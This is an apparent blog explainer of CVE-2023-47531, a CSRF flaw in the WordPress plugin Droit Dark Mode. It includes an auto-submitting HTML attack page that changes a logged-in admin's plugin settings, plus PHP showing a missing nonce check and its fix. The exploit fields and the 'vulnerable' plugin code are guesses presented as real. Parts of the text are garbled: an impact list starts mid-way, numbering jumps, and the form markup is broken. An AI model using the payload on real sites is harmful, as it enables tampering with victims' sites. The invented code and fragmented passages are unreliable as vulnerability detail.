If you’re running a WordPress site and love the look of dark mode, you might have used the popular Droit Dark Mode plugin by DroitThemes. But did you know that until recently, millions of sites using this plugin were vulnerable to a dangerous attack called Cross-Site Request Forgery (CSRF)? In this article, we’ll break down CVE-2023-47531—what it is, how it works, how it can be exploited with just a few lines of code, and what you must do to keep your website safe.
What is CVE-2023-47531?
CVE-2023-47531 is a Cross-Site Request Forgery (CSRF) vulnerability discovered in the WordPress plugin “Droit Dark Mode”, affecting all versions up to and including 1.1.2. CSRF means an attacker tricks a logged-in user to perform unwanted actions on your WordPress site—like changing plugin options—without your consent.
Official advisory: WPScan: CVE-2023-47531
Why is CSRF Even Bad?
Imagine you’re an admin on your site. You’re logged in and browse to another (malicious) website in a new browser tab. That site secretly submits a request to your WordPress site, changing plugin settings—like turning dark mode on or off, or worse, injecting unwanted scripts. Since you’re authenticated, your site sees this as coming from you. Ouch!
With Droit Dark Mode up to 1.1.2, the plugin did not verify requests properly, missing security checks like WordPress nonces.
Simple Exploit Explained (With Real Code!)
Let’s see how an attacker could exploit CVE-2023-47531 in the wild.
Suppose the plugin provides an AJAX or admin form to save its options at /wp-admin/admin-ajax.php or /wp-admin/options-general.php?page=droit-dark-mode.
Here’s a sample HTML page a hacker could send to a logged-in WordPress admin
<!DOCTYPE html>
<html>
<body>
<form action="https://YOUR_SITE/wp-admin/admin-post.php"; method="POST" id="csrf_form">
<input type="hidden" name="option1" value="whatever-attacker-wants">
<input type="hidden" name="option2" value="attacker_value">
<input type="hidden" name="action" value="droit_dark_mode_save_option">
</form>
<script>
document.getElementById("csrf_form").submit();
</script>
</body>
</html>
Any admin who’s logged in and visits this page will unknowingly execute the request—changing plugin options with no warning.
Behind the Scenes: Why Did This Happen?
WordPress developers are supposed to use nonces—special tokens to verify requests as legitimate. Droit Dark Mode’s vulnerable code forgot this step. That’s what let outsiders submit changes without proof the user wanted to.
Example (vulnerable backend PHP code in Droit Dark Mode)
// BAD - no CSRF (nonce) check!
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
update_option('droit_dark_mode_options', $_POST['options']);
}
This should have included
if ( ! isset( $_POST['my_plugin_nonce'] ) ||
! wp_verify_nonce( $_POST['my_plugin_nonce'], 'save_dark_mode_settings' ) ) {
die( 'CSRF check failed' );
}
Inject unexpected code or URLs: (If plugin settings allowed it)
- Social engineer site admins: If settings influenced how admins or users authenticate or perceive the site, attackers could launch even bigger attacks.
Never stay logged in as admin while browsing unknown or suspicious websites.
3. Use a website firewall (Sucuri or Wordfence) to block suspicious requests.
See the vendor’s changelog or support thread here
- Droit Dark Mode Changelog
- WordPress plugin support
Final Thoughts
CSRF flaws like CVE-2023-47531 are sneaky because you, as a user, don’t even realize your account is being abused. DroitThemes fixed this fast after discovery—but it’s on you, the site owner, to keep plugins updated.
Are you using Droit Dark Mode? Did you update? Let us know your experience in the comments! And remember—never trust a plugin that ignores WordPress’s security best practices.
More info
- NIST’s official CVE entry
- Wordfence Droit Dark Mode vulnerability post
*Stay safe, keep your themes and plugins patched, and don’t let a little dark mode turn into a dark day!*
Timeline
Published on: 11/18/2023 22:15:07 UTC
Last modified on: 11/24/2023 19:28:13 UTC